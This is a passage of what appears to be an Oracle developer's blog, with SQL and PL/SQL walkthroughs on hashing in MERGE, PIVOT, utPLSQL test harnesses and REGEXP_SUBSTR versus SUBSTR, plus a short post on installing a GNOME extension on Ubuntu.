standard_hash(sub_series||main_character)
order by 1
/
SUB_SERIES MAIN_CHARACTER COUNT(*) CID
-------------------- ---------------------- -------- ----------------------------------------
DEATH MORT 1 01EF7E9D4032CFCD901BB2A5A3E2A3CD6A09CC18
DEATH DEATH 2 167A14D874EA960F6DB7C2989A3E9DE07FAF5872
DEATH LU TZE 1 5B933A07FEB85D6F210825F9FC53F291FB1FF1AA
DEATH SUSAN STO HELIT 1 0DA3C5B55F4C346DFD3EBC9935CB43A35933B0C7
We’re going to populate this table :
create table discworld_subseries_aggregation
(
cid varchar2(128),
sub_series varchar2(50),
young_adult_flag varchar2(1),
number_of_books number,
total_pages number
)
/
…with the current contents of the DISCWORLD_BOOKS_STAGE table from earlier. We’ll then clear down the staging table, populate it with a new set of data and then merge it into this aggregation table.
alter session set nls_date_format = 'DD-MON-YYYY';
merge into discworld_subseries_aggregation agg
using
(
select
cast(standard_hash(sub_series||'#'||young_adult_flag||'#') as varchar2(128)) as cid,
sub_series,
young_adult_flag,
count(title) as number_of_books,
sum(pages) as total_pages
from discworld_books_stage
group by sub_series, young_adult_flag
) stg
on ( agg.cid = stg.cid)
when matched then update
set agg.number_of_books = agg.number_of_books + stg.number_of_books,
agg.total_pages = agg.total_pages + stg.total_pages
when not matched then insert ( cid, sub_series, young_adult_flag, number_of_books, total_pages)
values( stg.cid, stg.sub_series, stg.young_adult_flag, stg.number_of_books, stg.total_pages)
/
commit;
truncate table discworld_books_stage;
Once we’ve run this, the contents of DISCWORLD_SUBSERIES_AGGREGATION are :
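If you want to check for yourself, a query along these lines will show the current state of the table :
select cid, sub_series, young_adult_flag, number_of_books, total_pages
from discworld_subseries_aggregation
order by sub_series, young_adult_flag
/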
Next, we insert the rest of the Discworld books into the staging table :
And run the merge again :
alter session set nls_date_format = 'DD-MON-YYYY';
merge into discworld_subseries_aggregation agg
using
(
select
cast(standard_hash(sub_series||'#'||young_adult_flag||'#') as varchar2(128)) as cid,
sub_series,
young_adult_flag,
count(title) as number_of_books,
sum(pages) as total_pages
from discworld_books_stage
group by sub_series, young_adult_flag
) stg
on ( agg.cid = stg.cid)
when matched then update
set agg.number_of_books = agg.number_of_books + stg.number_of_books,
agg.total_pages = agg.total_pages + stg.total_pages
when not matched then insert ( cid, sub_series, young_adult_flag, number_of_books, total_pages)
values( stg.cid, stg.sub_series, stg.young_adult_flag, stg.number_of_books, stg.total_pages)
/
7 rows merged.
Whilst you may consider the default SHA1 method perfectly adequate for generating unique values, it may be of interest to examine the relative performance of the other available hashing algorithms.
For what it’s worth, my tests on an OCI Free Tier 19c instance using the following script were not that conclusive :
with hashes as
(
select rownum as id, standard_hash( rownum, 'MD5' ) as hash_val
from dual
connect by rownum <= 1000000
)
select hash_val, count(*)
from hashes
group by hash_val
having count(*) > 1
/
Running this twice for each method, replacing ‘MD5’ with each of the available algorithms in turn :
Method     Best Runtime (secs)
------     -------------------
MD5        0.939
SHA1       1.263
SHA256     2.223
SHA384     2.225
SHA512     2.280
I would imagine that, among other things, performance may be affected by the length of the input expression to the function.
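If you wanted to put that theory to the test, you could re-run the exercise with a longer input expression – a rough sketch, this time just counting distinct hashes over a padded-out value :
with hashes as
(
    select standard_hash( rpad( to_char( rownum), 4000, 'x'), 'SHA512') as hash_val
    from dual
    connect by rownum <= 1000000
)
select count( distinct hash_val)
from hashes
/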
Dr Who and Oracle SQL Pivot
Dr Who recently celebrated its 60th Anniversary and the BBC marked the occasion by making all episodes since 1963 available to stream.
This has given me the opportunity to relive those happy childhood Saturday afternoons spent cowering behind the sofa watching Tom Baker
take on the most fiendish adversaries that the Costume department could conjure up in the days before CGI.
Like the Doctor, I too am a time traveller. OK, so I can only move forwards through time, but I do have some knowledge of the future.
For example, present me knows that future me is an idiot who will undoubtedly forget the syntax for the Pivot command in Oracle SQL
next time he wants to pivot some VARCHAR2 columns.
So if you are future me, this is for you. You owe me a drink…
I have a simple table :
create table doctor_who
(
incarnation varchar2(50),
actor varchar2(100)
)
/
which I’ve populated with the following records :
select incarnation, actor
from doctor_who;
INCARNATION ACTOR
-------------------- ------------------------------
1st William Hartnell
2nd Patrick Troughton
3rd Jon Pertwee
4th Tom Baker
5th Peter Davison
6th Colin Baker
7th Sylvester McCoy
8th Paul McGann
9th Christopher Eccleston
10th David Tennant
11th Matt Smith
12th Peter Capaldi
13th Jodie Whittaker
14th David Tennant
15th Ncuti Gatwa
Fugitive Doctor Jo Martin
War Doctor John Hurt
17 rows selected.
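The inserts themselves aren’t shown here, but they’re nothing more exotic than :
insert into doctor_who( incarnation, actor) values ('1st', 'William Hartnell');
insert into doctor_who( incarnation, actor) values ('4th', 'Tom Baker');
insert into doctor_who( incarnation, actor) values ('War Doctor', 'John Hurt');
-- ...and so on for the remaining incarnations
commit;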
If I want a query to return a single row which lists selected incarnations, I can do this :
select *
from
(
select
incarnation,
actor
from doctor_who
)
pivot
(
max(actor)
for incarnation in
(
'1st' as first,
'4th' as fourth,
'10th' as tenth,
'War Doctor' as war,
'Fugitive Doctor' as fugitive
)
)
/
Which returns :
FIRST FOURTH TENTH WAR FUGITIVE
------------- ----------- --------------- ------------- -------------------
William Hartnell Tom Baker David Tennant John Hurt Jo Martin
The first thing to notice here is that the PIVOT clause insists on an aggregate function for the column that holds the data you want to display.
Failure to use one results in :
ORA-56902: expect aggregate function inside pivot operation
Fortunately, the MAX function works happily with VARCHAR2 and doesn’t impact the data in ACTOR, because there’s only one value for each incarnation in our example.
Unsurprisingly, the subquery needs to include both the columns to pivot and those containing the values we want to display.
If you think having a list of Doctor Who Actors means that we already have quite enough stars, you can tweak the query so that we name the columns we’re querying in the SELECT clause.
Note that you can only use columns that you’ve defined in the PIVOT clause ( although you don’t have to use all of them) :
select fourth, tenth, war, fugitive
-- Not selecting "first", although it's defined in the PIVOT clause
-- may be useful when developing/debugging
from
(
select
incarnation,
actor
from doctor_who
)
pivot
(
max(actor)
for incarnation in
(
'4th' as fourth,
'10th' as tenth,
'War Doctor' as war,
'Fugitive Doctor' as fugitive,
'1st' as first
)
)
/
FOURTH TENTH WAR FUGITIVE
-------------------- -------------------- -------------------- --------------------
Tom Baker David Tennant John Hurt Jo Martin
Finally, as you’d expect, the PIVOT CLAUSE does not affect the number of rows read to process the query.
For that, we still need a good old-fashioned WHERE clause in the subquery.
On my OCI 19c Free Tier instance, the plan for the above statement is :
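If you’re following along and want to see the plan for yourself, DBMS_XPLAN will show the one for the most recently executed statement in your session – for example :
-- in SQL*Plus, serveroutput needs to be off for display_cursor to report on the previous statement
set serveroutput off

select *
from table( dbms_xplan.display_cursor())
/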
If we add a WHERE clause, however :
select fourth, tenth, war, fugitive
from
(
select
incarnation,
actor
from doctor_who
where incarnation in ('4th', '10th', 'War Doctor', 'Fugitive Doctor', '1st')
)
pivot
(
max(actor)
for incarnation in
(
'4th' as fourth,
'10th' as tenth,
'War Doctor' as war,
'Fugitive Doctor' as fugitive,
'1st' as first
)
)
/
Now that’s done, I can watch the next episode of Dr Who and the Sticky-back Plastic Monster. Unfortunately, I no longer fit behind the sofa.
Installing a Gnome Desktop Extension in Ubuntu
To distract myself from England’s ongoing woes at the Cricket World Cup, I’ve been playing the simple-yet-addictive London Tube Map Memory Game.
Having not taken the tube for a few years now, it’s proving something of a challenge.
It doesn’t help that they’ve added quite a few stations recently.
Another test of my memory occurs on those rare occasions where I want to terminate a frozen window on my Gnome desktop.
There’s an excellent utility called xkill which does the job…and which I can never remember the name of !
Fortunately there is a Gnome Shell Extension which will add an icon to the gnome-panel at the top of the screen so
it’s only a mouse-click away…
Let’s start with a quick look at xkill in action :
Before we go any further, it’s probably a good idea to confirm which versions of Ubuntu and Gnome I currently have running.
For Ubuntu itself :
cat /etc/release
Ubuntu 22.04.3 LTS \n \l
…and for Gnome…
gnome-shell --version
GNOME Shell 42.9
Installing Extensions Manager
One way to manage Gnome Shell Extensions is to install the appropriately named Extension Manager.
To do this, open a Terminal and run :
sudo apt install gnome-shell-extension-manager
Once installed, you should then find Extension Manager in Activities :
Open it and you’ll see
Click the Browse tab to search for extensions
I know that the Extension I want is called Force Quit and the author is megh. Extension Manager can’t find the Extension by its name, but it does if we search for the author.
Clicking the Install Button and confirming when prompted causes the extension to be installed and activated.
We can now see it in the Activity Bar :
Let’s give it a try
Well, that’s one less thing to remember.
Back to ignoring the cricket !
Cut-and-Paste-Driven-Development – Using utPLSQL to build a test harness in Oracle.
If you’re working on a Decision Support System (DSS) then sooner or later you’re likely to need to create or change a package which runs as part of a lengthy batch process.
In such circumstances, it would be useful to have a good old-fashioned test harness to run your code so you can test its functionality without having to kick off the entire batch.
Fortunately, utPLSQL is not just useful when it comes to TDD, CI/CD pipelines and the like. It can easily be used for the purpose of creating a simple stand-alone unit test for a single package.
Having used utPLSQL for this purpose quite regularly, I’ve found that my test harnesses tend to follow the same basic pattern.
What follows is a walkthrough of a typical utPLSQL package I might construct for this purpose.
Obviously, it won’t be to everyone’s taste but hopefully, you’ll find something of use in it.
If you’re interested, you can find the code in this Github Repo.
Testing Approach
The main purpose of these tests is to check that the program being tested produces a set result for a set input.
Each individual test is structured in four sequential phases :
- Setup – set up the input data to use in the test
- Execute – run the test and retrieve the output
- Validate – check that the output matches what we expect
- Teardown – reset everything back to how it was before we ran the test.
Whilst tables in DSS applications can contain a large number of columns, our test records only need to contain values that are :
- mandatory in the table ( or possibly part of an RI constraint or Unique Key)
- relevant to the test we’re conducting
In terms of the values themselves, they are not usually constrained other than by the definition of the column into which they are being inserted.
Therefore, we may be able to use negative numbers for integer identifiers to avoid clashes with any pre-existing records.
Also there may be nothing to stop us using random strings for VARCHAR2 values. Alternatively, if you’re easily amused, you may craft your test values to follow a theme. Not that I’d ever do anything so frivolous…
The database I’m running on is Oracle 19c on Oracle Cloud (Free Tier).
The version of utPLSQL used here is 3.1.13, downloaded from the Project’s Github Repo
It was installed without the DDL trigger by connecting to my OCI instance as the Admin user and following the appropriate instructions here.
The Code we'll be Testing

The package we want to test performs updates on this table :
drop table employees_core;
create table employees_core
(
-- Columns populated by initial load
load_id number not null,
employee_id number not null,
first_name varchar2(20),
last_name varchar2(25),
email varchar2(25),
phone_number varchar2(20),
hire_date date,
job_id varchar2(10),
salary number,
commission_pct number,
manager_id number,
department_id number,
-- Additional columns populated as part of enrichment process
-- Job details
job_title varchar2(50),
-- Department Details
department_name varchar2(50),
-- Enrichment status
record_status varchar2(25),
constraint employees_core_pk primary key (load_id, employee_id)
)
/
To do so, it queries these tables :
create table departments
(
department_id number not null,
department_name varchar2(30) not null,
manager_id number,
location_id number,
constraint departments_pk primary key ( department_id)
)
/
create table jobs
(
JOB_ID varchar2(10) not null,
JOB_TITLE varchar2(35) not null,
MIN_SALARY number,
MAX_SALARY number,
constraint jobs_pk primary key( job_id)
)
/
The package itself is :
create or replace package enrich_employees
is
procedure department_details( i_load_id in number);
procedure job_details( i_load_id in number);
end;
/
create or replace package body enrich_employees
is
procedure department_details( i_load_id in number)
is
-- Populate the Department Name.
-- Suspend the record if we don't get a match.
begin
merge into employees_core emp
using departments dept
on
(
emp.department_id = dept.department_id
and emp.load_id = i_load_id
and emp.record_status = 'PROCESS'
)
when matched then update
set emp.department_name = dept.department_name;
update employees_core
set record_status = 'DEPARTMENT_ID_NOT_FOUND'
where record_status = 'PROCESS'
and department_name is null;
commit;
end department_details;
procedure job_details( i_load_id in number)
is
-- Don't suspend if we don't get a match, just leave the job_title empty.
begin
merge into employees_core emp
using jobs j
on
(
emp.job_id = j.job_id
and emp.record_status = 'PROCESS'
and emp.load_id = i_load_id
)
when matched then update
set emp.job_title = j.job_title;
commit;
end job_details;
end;
/
Note that, as is common in such routines, commits are done immediately after potentially large DML statements in order to minimise the length of time that Undo space is in use.
This is significant as we’ll need to account for it explicitly in our tests.
For the DEPARTMENT_DETAILS procedure, we want to check what happens when :
- we find a match in the DEPARTMENTS table
- we don’t find a match
- the DEPARTMENT_ID on the core record is null
For JOB_DETAILS, the conditions to test are similar :
- RECORD_STATUS is not ‘PROCESS’
- we find a match in the JOBS table
- we don’t find a match
- the JOB_ID is null
From this list of scenarios, we can construct our test package specification :
create or replace package enrich_employees_ut
as
--%suite(enrich_employees_ut)
--%rollback(Manual)
--%test( Department Lookup Succeeds)
procedure department_is_found;
--%test( Department does not exist)
procedure department_not_found;
--%test( Department ID is null)
procedure department_is_null;
--%test( Status is not PROCESS)
procedure status_not_process;
--%test( Job Lookup Succeeds)
procedure job_is_found;
--%test( Job does not exist)
procedure job_not_found;
--%test( Job ID is null)
procedure job_is_null;
end enrich_employees_ut;
The annotations we’re using here are :
--%suite(enrich_employees_ut)
…which gives us the option to group multiple test packages into the same suite, should we want to.
--%rollback(Manual)
…which prevents the framework attempting its default rollback behaviour ( rollback to a savepoint), which won't work here due to the commits in the code we're testing.
--%test
…which identifies and describes the tests themselves.
Creating a Stub for the Test Package Body

We may well want to write tests and run them one-at-a-time so that we can adjust them ( or, indeed, the code we're testing) as we go.
In such circumstances, a script such as this, which uses the already created test package specification to generate a file containing the ddl for the package body, might come in handy :
clear screen
set heading off
set lines 130
set pages 500
set feedback off
set verify off
column pkg new_value v_package_name noprint
select '&1' as pkg from dual;
spool '&v_package_name..pkb'
with package_skeleton as
(
select 1 as line, 'create or replace package body &v_package_name' as text from dual
union
select line,
case
when line < ( select max(line) from user_source where name = upper('&v_package_name') and type = 'PACKAGE')
then
replace (
replace(
replace(text, '%test('),
')')
,';', q'[ is begin ut.fail('Not yet written'); end;]')
else text
end as text
from user_source
where name = upper('&v_package_name')
and type = 'PACKAGE'
and line > 1
and
(
regexp_replace(text, '[[:space:]]') not like '--\%%' escape '\'
or
regexp_replace(text, '[[:space:]]') like '--\%test%' escape '\'
)
)
select text from package_skeleton order by line
/
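For what it's worth, I tend to save this script as something like gen_test_stub.sql ( the filename is just my own convention ) and run it from SQL*Plus, passing the test package name as the only argument, then compile the spooled file :

@gen_test_stub.sql enrich_employees_ut
@enrich_employees_ut.pkb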
In this case, the generated package body looks like this, and compiles straight away :
create or replace package body enrich_employees_ut
as
-- Department Lookup Succeeds
procedure department_is_found is begin ut.fail('Not yet written'); end;
-- Department does not exist
procedure department_not_found is begin ut.fail('Not yet written'); end;
-- Department ID is null
procedure department_is_null is begin ut.fail('Not yet written'); end;
-- Status is not PROCESS
procedure status_not_process is begin ut.fail('Not yet written'); end;
-- Job Lookup Succeeds
procedure job_is_found is begin ut.fail('Not yet written'); end;
-- Job does not exist
procedure job_not_found is begin ut.fail('Not yet written'); end;
-- Job ID is null
procedure job_is_null is begin ut.fail('Not yet written'); end;
end enrich_employees_ut;
I prefer to create global variables to hold the test data.
This is because each test is likely to use a similar data set so, this way, the variables only need to be declared once.
As we’re dealing with table rows here, I’m just declaring a single record variable for each table.
This makes it very simple to add columns that we want to populate as they’re pre-declared as part of the record type.
For this test, my globals are :
g_emp employees_core%rowtype;
g_job jobs%rowtype;
g_dept departments%rowtype;
g_result employees_core%rowtype;
Next, we need a procedure to initialise these globals :
procedure set_globals
is
begin
-- start by setting the globals to the values required for the first test, which
-- I usually make the test for the most commonly expected behaviour
--
-- Values for Employees Core record
--
-- Making numeric values negative means that they are less likely to clash
-- with an existing sequence generated value
g_emp.load_id := -1;
g_emp.employee_id := -8;
-- However wide the table, we only have to populate mandatory columns, and
-- any columns we want for the tests...
g_emp.department_id := -64;
g_emp.record_status := 'PROCESS';
-- Job Id is a Varchar - no constraints on it other than length...
g_emp.job_id := 'WIZZARD';
--
-- Values for the Department Lookup ( starting with ones that we expect to find)
--
-- Values set independently of the EMPLOYEES_CORE values as we'll want to see what happens
-- if they DON'T match, as well as if they do.
g_dept.department_id := -64;
g_dept.department_name := 'Cruel and Unusual Geography';
--
-- Values for the Job lookup
--
g_job.job_id := 'WIZZARD';
g_job.job_title := 'Professor';
end set_globals;
Then there is a procedure to create the test records using the global variable values.
This separation between initialising the globals and creating the records is needed so that we can “tweak” the values we use for each test as appropriate :
procedure setup_data
is
-- Populate the tables with our test data
begin
insert into employees_core values g_emp;
insert into departments values g_dept;
insert into jobs values g_job;
commit;
end setup_data;
This is followed by a procedure to retrieve the actual results of the program execution :
procedure fetch_results
is
cursor c_result is
select *
from employees_core
where load_id = g_emp.load_id
and employee_id = g_emp.employee_id;
begin
open c_result;
fetch c_result into g_result;
close c_result;
end fetch_results;
Finally, as we need to tidy up after we’ve finished, there’s a teardown procedure to remove any test records we’ve set up :
procedure teardown_data
is
-- Tidy up by removing the test data using unique values where possible.
begin
delete from employees_core
where employee_id = g_emp.employee_id
and load_id = g_emp.load_id;
delete from departments
where department_id = g_dept.department_id;
delete from jobs
where job_id = g_job.job_id;
commit;
end teardown_data;
You might think we’ve done quite a bit of typing without writing any tests. The payoff for this up-front effort becomes apparent when you start on the first test, as you’re pretty much just calling everything you’ve already written and only need to add a couple of expectations, and an exception handler :
-- Department Lookup Succeeds
procedure department_is_found
is
begin
-- Setup
set_globals;
setup_data;
-- Execute
enrich_employees.department_details(g_emp.load_id);
-- Get the actual results
fetch_results;
-- Validate
ut.expect( g_result.department_name).to_(equal(g_dept.department_name));
ut.expect( g_result.record_status).to_(equal('PROCESS'));
-- Teardown
teardown_data;
exception when others then
dbms_output.put_line(dbms_utility.format_error_stack);
ut.fail('Unexpected Error');
teardown_data;
end;
The exception handler is there to ensure that the teardown runs even if we hit an unexpected error.
This is more likely than usual, as you're developing the test code and (potentially) the code you're testing iteratively when running these tests.
We can execute our test standalone :
set serverout on
exec ut.run('enrich_employees_ut.department_is_found');

enrich_employees_ut
  Department Lookup Succeeds [.005 sec]

Finished in .007019 seconds
1 tests, 0 failed, 0 errored, 0 disabled, 0 warning(s)

PL/SQL procedure successfully completed.
The code for our second test is almost identical, apart from the change in one variable value and the expected results :
-- Department does not exist
procedure department_not_found
is
begin
-- Setup
set_globals;
-- Almost exactly the same as the first test except...
g_emp.department_id := -4096;
setup_data;
-- Execute
enrich_employees.department_details(g_emp.load_id);
fetch_results;
-- Validate
ut.expect( g_result.department_name).to_(be_null());
ut.expect( g_result.record_status).to_(equal('DEPARTMENT_ID_NOT_FOUND'));
-- Teardown
teardown_data;
exception when others then
dbms_output.put_line(dbms_utility.format_error_stack);
ut.fail('Unexpected Error');
teardown_data;
end;
The rest of the tests follow a broadly similar pattern.
The finished test package body looks like this :
create or replace package body enrich_employees_ut
as
-- Global variables for use in tests
g_emp employees_core%rowtype;
g_job jobs%rowtype;
g_dept departments%rowtype;
g_result employees_core%rowtype;
procedure set_globals
is
begin
g_emp.load_id := -1;
g_emp.employee_id := -8;
g_emp.department_id := -64;
g_emp.record_status := 'PROCESS';
g_emp.job_id := 'WIZZARD';
g_dept.department_id := -64;
g_dept.department_name := 'Cruel and Unusual Geography';
g_job.job_id := 'WIZZARD';
g_job.job_title := 'Professor';
end set_globals;
procedure setup_data
is
begin
insert into employees_core values g_emp;
insert into departments values g_dept;
insert into jobs values g_job;
commit;
end setup_data;
procedure fetch_results
is
cursor c_result is
select *
from employees_core
where load_id = g_emp.load_id
and employee_id = g_emp.employee_id;
begin
open c_result;
fetch c_result into g_result;
close c_result;
end fetch_results;
procedure teardown_data
is
-- Tidy up by removing the test data using unique values where possible.
begin
delete from employees_core
where employee_id = g_emp.employee_id
and load_id = g_emp.load_id;
delete from departments
where department_id = g_dept.department_id;
delete from jobs
where job_id = g_job.job_id;
commit;
end teardown_data;
-- Department Lookup Succeeds
procedure department_is_found
is
begin
-- Setup
set_globals;
setup_data;
-- Execute
enrich_employees.department_details(g_emp.load_id);
fetch_results;
-- Validate
ut.expect( g_result.department_name).to_(equal(g_dept.department_name));
ut.expect( g_result.record_status).to_(equal('PROCESS'));
-- Teardown
teardown_data;
exception when others then
dbms_output.put_line(dbms_utility.format_error_stack);
ut.fail('Unexpected Error');
teardown_data;
end;
-- Department does not exist
procedure department_not_found
is
begin
-- Setup
set_globals;
-- Almost exactly the same as the first test except...
g_emp.department_id := -4096;
setup_data;
-- Execute
enrich_employees.department_details(g_emp.load_id);
fetch_results;
-- Validate
ut.expect( g_result.department_name).to_(be_null());
ut.expect( g_result.record_status).to_(equal('DEPARTMENT_ID_NOT_FOUND'));
-- Teardown
teardown_data;
exception when others then
dbms_output.put_line(dbms_utility.format_error_stack);
ut.fail('Unexpected Error');
teardown_data;
end;
-- Department ID is null
procedure department_is_null
is
begin
-- Setup
set_globals;
-- Again, just a single change required :
g_emp.department_id := null;
setup_data;
-- Execute
enrich_employees.department_details(g_emp.load_id);
fetch_results;
-- Validate
ut.expect( g_result.department_name).to_(be_null());
ut.expect( g_result.record_status).to_(equal('DEPARTMENT_ID_NOT_FOUND'));
-- Teardown
teardown_data;
exception when others then
dbms_output.put_line(dbms_utility.format_error_stack);
ut.fail('Unexpected Error');
teardown_data;
end;
-- Status is not PROCESS
procedure status_not_process
is
begin
-- Setup
set_globals;
-- This time set the status to prevent processing
g_emp.record_status := 'SUSPENDED';
setup_data;
-- Execute
enrich_employees.department_details(g_emp.load_id);
fetch_results;
-- Validate
ut.expect( g_result.department_name).to_(be_null());
ut.expect( g_result.record_status).to_(equal('SUSPENDED'));
-- Teardown
teardown_data;
exception when others then
dbms_output.put_line(dbms_utility.format_error_stack);
ut.fail('Unexpected Error');
teardown_data;
end;
-- JOB Lookup Succeeds
procedure job_is_found
is
begin
-- Setup
-- We can use the default values here
set_globals;
setup_data;
-- Execute
enrich_employees.job_details(g_emp.load_id);
fetch_results;
-- Validate
ut.expect( g_result.job_title).to_(equal(g_job.job_title));
-- Teardown
teardown_data;
exception when others then
dbms_output.put_line(dbms_utility.format_error_stack);
ut.fail('Unexpected Error');
teardown_data;
end;
-- Job does not exist
procedure job_not_found
is
begin
-- Setup
set_globals;
g_emp.job_id := -32768;
setup_data;
-- Execute
enrich_employees.job_details(g_emp.load_id);
-- Get the actual results
fetch_results;
-- Validate
ut.expect( g_result.job_title).to_(be_null());
ut.expect( g_result.record_status).to_(equal('PROCESS'));
-- Teardown
teardown_data;
exception when others then
dbms_output.put_line(dbms_utility.format_error_stack);
ut.fail('Unexpected Error');
teardown_data;
end;
-- Job ID is null
procedure job_is_null
is
begin
-- Setup
set_globals;
g_emp.job_id := null;
setup_data;
-- Execute
enrich_employees.job_details(g_emp.load_id);
fetch_results;
-- Validate
ut.expect( g_result.job_title).to_(be_null());
ut.expect( g_result.record_status).to_(equal('PROCESS'));
-- Teardown
teardown_data;
exception when others then
dbms_output.put_line(dbms_utility.format_error_stack);
ut.fail('Unexpected Error');
teardown_data;
end;
end enrich_employees_ut;
To run all of the tests in a suite, I usually use a script like this, which handles recompilation of either the test package or the code unit being tested without raising all those pesky ORA-4068 errors :
exec dbms_session.modify_package_state(dbms_session.reinitialize);
clear screen
set serveroutput on size unlimited
exec ut.run('enrich_employees_ut');

enrich_employees_ut
  Department Lookup Succeeds [.004 sec]
  Department does not exist [.003 sec]
  Department ID is null [.003 sec]
  Status is not PROCESS [.003 sec]
  Job Lookup Succeeds [.003 sec]
  Job does not exist [.003 sec]
  Job ID is null [.003 sec]

Finished in .026568 seconds
7 tests, 0 failed, 0 errored, 0 disabled, 0 warning(s)

PL/SQL procedure successfully completed.
Of course I will probably still need to run a batch at some point if I want to perform a full System Test and (optionally) a load test. For now however, I can be confident that my code is at least functionally correct.
A Performance Comparison between Oracle’s REGEXP_SUBSTR and SUBSTR functions
Oracle SQL offers support for POSIX regular expressions by means of a suite of native functions.
“Regular Expressions are a pathway to many abilities that some consider…unnatural.”

Whilst it provides the complex search conditions that regular expressions offer, REGEXP_SUBSTR has acquired a reputation for being a fair bit slower than the standard SUBSTR function.
What I’m going to demonstrate here is :
- how SUBSTR seems generally to be faster than REGEXP_SUBSTR
- how the performance of REGEXP_SUBSTR can improve dramatically when used with INSTR
- REGEXP_SUBSTR performs better when it matches the start of a string
To start with though, we'll discover why you'll never see a Sith Lord on Sesame Street ( hint : it's the way they count in a Galaxy Far, Far Away)…
A Test Table

We have a two-column table that looks like this :
create table star_wars_numbers
(
id number generated always as identity,
episode varchar2(4000)
)
/
insert into star_wars_numbers( episode)
values('Four');
insert into star_wars_numbers( episode)
values('Four|Five');
insert into star_wars_numbers( episode)
values('Four|Five|Six');
insert into star_wars_numbers( episode)
values('Four|Five|Six|One');
insert into star_wars_numbers( episode)
values('Four|Five|Six|One|Two');
insert into star_wars_numbers( episode)
values('Four|Five|Six|One|Two|Three');
insert into star_wars_numbers( episode)
values('Four|Five|Six|One|Two|Three|Seven');
insert into star_wars_numbers( episode)
values('Four|Five|Six|One|Two|Three|Seven|Three-and-a-bit');
insert into star_wars_numbers( episode)
values('Four|Five|Six|One|Two|Three|Seven|Three-and-a-bit|Three and a bit less of a bit');
insert into star_wars_numbers( episode)
values('Four|Five|Six|One|Two|Three|Seven|Three-and-a-bit|Three and a bit less of a bit|Eight');
insert into star_wars_numbers( episode)
values('Four|Five|Six|One|Two|Three|Seven|Three-and-a-bit|Three and a bit less of a bit|Eight|Nine');
commit;
Whilst the contents of the EPISODES column may be the result of arcane Sith ritual, Moof-Milker activity in the design process cannot be ruled out.
Either way, the EPISODES column contains up to 11 values, with multiple values being separated by a '|'.
Extracting each value in SQL

Using SUBSTR and INSTR to separate out the values in EPISODES is, as ever, quite a bit of typing…
select
id,
episode,
substr
(
episode,
1,
case
when instr(episode, '|') > 0 then instr(episode, '|') -1
else length(episode)
end
) as "A New Hope",
case when instr(episode, '|', 1, 1) > 0 then
substr
(
episode,
instr(episode, '|', 1, 1) + 1, -- start
case
when instr(episode, '|', 1, 2) > 0 then instr(episode, '|', 1,2) -1
else length(episode)
end
-
instr(episode, '|', 1, 1)
)
end as "The Empire Strikes Back",
case when instr(episode, '|', 1, 2) > 0 then
substr( episode, instr(episode, '|', 1, 2) + 1,
case when instr(episode, '|', 1,3) > 0 then instr(episode, '|',1,3) - 1 else length(episode) end
-
instr(episode, '|', 1, 2))
end as "Return of the Jedi",
case when instr(episode, '|', 1, 3) > 0 then
substr( episode, instr(episode, '|', 1, 3) + 1,
case when instr(episode, '|', 1,4) > 0 then instr(episode, '|',1,4) - 1 else length(episode) end
-
instr(episode, '|', 1, 3))
end as "Phantom Menace",
case when instr(episode, '|', 1, 4) > 0 then
substr( episode, instr(episode, '|', 1, 4) + 1,
case when instr(episode, '|', 1,5) > 0 then instr(episode, '|',1,5) - 1 else length(episode) end
-
instr(episode, '|', 1, 4))
end as "Attack of the Clones",
case when instr(episode, '|', 1, 5) > 0 then
substr( episode, instr(episode, '|', 1, 5) + 1,
case when instr(episode, '|', 1,6) > 0 then instr(episode, '|',1,6) - 1 else length(episode) end
-
instr(episode, '|', 1, 5))
end as "Revenge of the Sith",
case when instr(episode, '|', 1, 6) > 0 then
substr( episode, instr(episode, '|', 1, 6) + 1,
case when instr(episode, '|', 1,7) > 0 then instr(episode, '|',1,7) - 1 else length(episode) end
-
instr(episode, '|', 1, 6))
end as "The Force Awakens",
case when instr(episode, '|', 1, 7) > 0 then
substr( episode, instr(episode, '|', 1, 7) + 1,
case when instr(episode, '|', 1,8) > 0 then instr(episode, '|',1,8) - 1 else length(episode) end
-
instr(episode, '|', 1, 7))
end as "Rogue One",
case when instr(episode, '|', 1, 8) > 0 then
substr( episode, instr(episode, '|', 1, 8) + 1,
case when instr(episode, '|', 1,9) > 0 then instr(episode, '|',1,9) - 1 else length(episode) end
-
instr(episode, '|', 1, 8))
end as "Solo",
case when instr(episode, '|', 1, 9) > 0 then
substr( episode, instr(episode, '|', 1, 9) + 1,
case when instr(episode, '|', 1, 10) > 0 then instr(episode, '|',1, 10) - 1 else length(episode) end
-
instr(episode, '|', 1, 9))
end as "The Last Jedi",
case when instr(episode, '|', 1, 10) > 0 then
substr( episode, instr(episode, '|', 1, 10) + 1,
case when instr(episode, '|', 1, 11) > 0 then instr(episode, '|',1, 11) - 1 else length(episode) end
-
instr(episode, '|', 1, 10))
end as "The Rise of Skywalker"
from star_wars_numbers
/
…although these days ( version 12c and later), we can save ourselves a bit of effort by using an inline function…
with function extract_episode( i_string in varchar2, i_pos in pls_integer)
return varchar2
is
begin
if i_pos = 1 then
return substr(i_string, 1, case when instr(i_string, '|') > 0 then instr(i_string, '|') - 1 else length(i_string) end);
end if;
return
case when instr(i_string, '|', 1, i_pos -1 ) > 0 then
substr( i_string, instr(i_string, '|', 1, i_pos -1) + 1,
case when instr(i_string, '|', 1, i_pos) > 0 then instr(i_string, '|',1, i_pos) - 1 else length(i_string) end
-
instr( i_string, '|', 1, i_pos - 1))
end;
end;
select
id, episode,
extract_episode( episode, 1) as "A New Hope",
extract_episode( episode, 2) as "Empire Strikes Back",
extract_episode( episode, 3) as "Return of the Jedi",
extract_episode( episode, 4) as "The Phantom Menace",
extract_episode( episode, 5) as "Attack of the Clones",
extract_episode( episode, 6) as "Revenge of the Sith",
extract_episode( episode, 7) as "The Force Awakens",
extract_episode( episode, 8) as "Rogue One",
extract_episode( episode, 9) as "Solo",
extract_episode( episode, 10) as "The Last Jedi",
extract_episode( episode, 11) as "The Rise of Skywalker"
from star_wars_numbers
/
Whether you find the equivalent regexp query more elegant or just horrible is somewhat subjective :
select
regexp_substr(episode, '[^|]+') as "A New Hope",
regexp_substr(episode, '[^|]+',1, 2) as "The Empire Strikes Back",
regexp_substr(episode, '[^|]+',1, 3) as "Return of the Jedi",
regexp_substr(episode, '[^|]+',1, 4) as "The Phantom Menace",
regexp_substr(episode, '[^|]+',1, 5) as "Attack of the Clones",
regexp_substr(episode, '[^|]+',1, 6) as "Revenge of the Sith",
regexp_substr(episode, '[^|]+',1, 7) as "The Force Awakens",
regexp_substr(episode, '[^|]+',1, 8) as "Rogue One",
regexp_substr(episode, '[^|]+',1, 9) as "Solo",
regexp_substr(episode, '[^|]+',1, 10) as "The Last Jedi",
